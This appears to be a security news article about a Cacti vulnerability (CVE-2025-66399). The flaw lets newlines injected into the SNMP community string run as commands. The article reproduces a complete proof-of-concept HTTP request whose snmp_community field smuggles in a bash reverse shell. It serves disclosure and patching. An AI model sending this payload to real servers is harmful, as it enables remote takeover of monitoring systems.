High-Severity Cacti Flaw (CVE-2025-66399) Risks Remote Code Execution via SNMP Community String Injection

A high-severity security flaw has been uncovered in Cacti, the popular open-source network graphing solution. The vulnerability, tracked as CVE-2025-66399, exposes Cacti installations to Remote Code Execution (RCE), potentially allowing attackers to seize full control of the monitoring server.

The core of the problem lies in how Cacti handles the SNMP Community String—a credential used to query network devices. When an administrator or a user with device-edit permissions saves a device, the application fails to scrub the input for dangerous characters.

The advisory explicitly notes an “input-validation flaw in the SNMP device configuration functionality.” Specifically, the code responsible for validating the community string (snmp_community) is missing a critical filter. The regex used for sanitization “is intentionally left empty (“), disabling validation.”

This oversight means that “newline characters remain unmodified.”

Because the system doesn’t strip these characters, an attacker can inject malicious commands that the backend system interprets as separate instructions.

“An authenticated Cacti user can supply crafted SNMP community strings containing control characters (including newlines) that are accepted, stored verbatim in the database, and later embedded into backend SNMP operations.”

When Cacti attempts to poll the device using downstream tools (like snmpwalk or wrappers), the injected newline breaks the command structure. “In environments where downstream SNMP tooling or wrappers interpret newline-separated tokens as command boundaries, this can lead to unintended command execution with the privileges of the Cacti process.”

The advisory provides a clear example of how a “crafted multi-line community string” is stored. An attacker can inject a payload such as:

POST /cacti/host.php?header=false HTTP/1.1
Host: localhost
X-Requested-With: XMLHttpRequest
Accept-Encoding: gzip, deflate, br

__csrf_magic=sid%3A3a2d0b3cddfb5912184b4b5130bb698650fc35d2%2C1764272981&description=aaa&hostname=127.0.0.1&location=&poller_id=1&site_id=1&host_template_id=0&device_threads=1&snmp_version=2&snmp_community=public%0abash%20-c%20'bash%20-i%20%3e%26%20%2fdev%2ftcp%2f127.0.0.1%2f4444%200%3e%261'%0a%23&snmp_security_level=authPriv&snmp_auth_protocol=MD5&snmp_username=&snmp_password=&snmp_password_confirm=&snmp_priv_protocol=DES&snmp_priv_passphrase=&snmp_priv_passphrase_confirm=&snmp_context=&snmp_engine_id=&snmp_port=161&snmp_timeout=500&max_oids=10&bulk_walk_size=0&availability_method=2&ping_method=1&ping_port=23&ping_timeout=400&ping_retries=1&notes=&external_id=&id=3&save_component_host=1&graph_template_id=297&snmp_query_id=2&reindex_method=1&action=save

As a result, arbitrary commands may execute with the privileges of the Cacti process.

The consequences of this vulnerability are severe. Successful exploitation can lead to

• Unauthorized modification of monitoring data
• Execution of system-level commands
• Unauthorized file writes
• Potential full compromise of the Cacti server

The development team has released a patch to address this flaw. Administrators are urged to upgrade immediately to version 1.2.29.

Related Posts:

• Cisco Systems exists Hardcoded Backdoor Account
• Cisco SNMP Flaw (CVE-2025-20352) Actively Exploited: Patch Now to Stop Root Access!
• Cactus Ransomware Targets Qlik Sense Servers